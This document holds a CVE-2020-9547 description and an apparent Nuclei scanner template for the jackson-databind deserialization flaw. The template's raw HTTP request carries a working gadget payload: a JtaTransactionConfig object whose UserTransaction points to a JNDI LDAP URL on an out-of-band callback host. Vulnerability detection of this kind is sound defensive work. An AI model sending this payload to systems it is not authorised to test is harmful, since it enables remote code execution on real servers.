FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap). This vulnerability allows attackers to execute arbitrary code through deserialization of untrusted data when polymorphic type handling (@JsonTypeInfo with use=JsonTypeInfo.Id.CLASS) is enabled.
PoC代码[已公开]
id: CVE-2020-9547
info:
name: FasterXML jackson-databind - Deserialization Remote Code Execution
author: pranjalnegi
severity: critical
description: |
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap). This vulnerability allows attackers to execute arbitrary code through deserialization of untrusted data when polymorphic type handling (@JsonTypeInfo with use=JsonTypeInfo.Id.CLASS) is enabled.
impact: |
Successful exploitation could allow an attacker to execute arbitrary code on the affected system through deserialization of malicious JSON payloads.
remediation: |
Update FasterXML jackson-databind to version 2.9.10.4 or later. Alternatively, disable polymorphic type handling or implement proper input validation and deserialization controls.
reference:
- https://github.com/fairyming/CVE-2020-9547
- https://github.com/FasterXML/jackson-databind/issues/2620
- https://nvd.nist.gov/vuln/detail/CVE-2020-9547
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-9547
cwe-id: CWE-502
epss-score: 0.53634
epss-percentile: 0.97918
cpe: cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: fasterxml
product: jackson-databind
verified: true
tags: cve,cve2020,jackson,databind,deserialization,rce
variables:
randstr: "{{rand_text_alphanumeric(8)}}"
payload_jndi_ldap: "ldap://{{interactsh-url}}/{{randstr}}"
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
["com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",{"properties":["java.util.Properties",{"UserTransaction":"{{payload_jndi_ldap}}"}]}]
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol, 'dns')"
- "contains_any(content_type, 'application/json', 'text/plain')"
- "status_code == 200 || status_code == 400 || status_code == 500"
condition: and
- type: word
part: body
words:
- "JsonMappingException"
- "InvalidTypeIdException"
- "JdbcRowSetImpl"
- "com.fasterxml.jackson.databind"
- "javax.naming.NamingException"
condition: or
# digest: 4b0a00483046022100b13a6e5dc487897cbaeaef7719cc8c644699eef859f14b9380bd5dbf7643eecb022100c39e9b18089702bc1a1955cedb037cecb469055559b63150a61758659bb66393:922c64590222798bb761d5b6d8e72950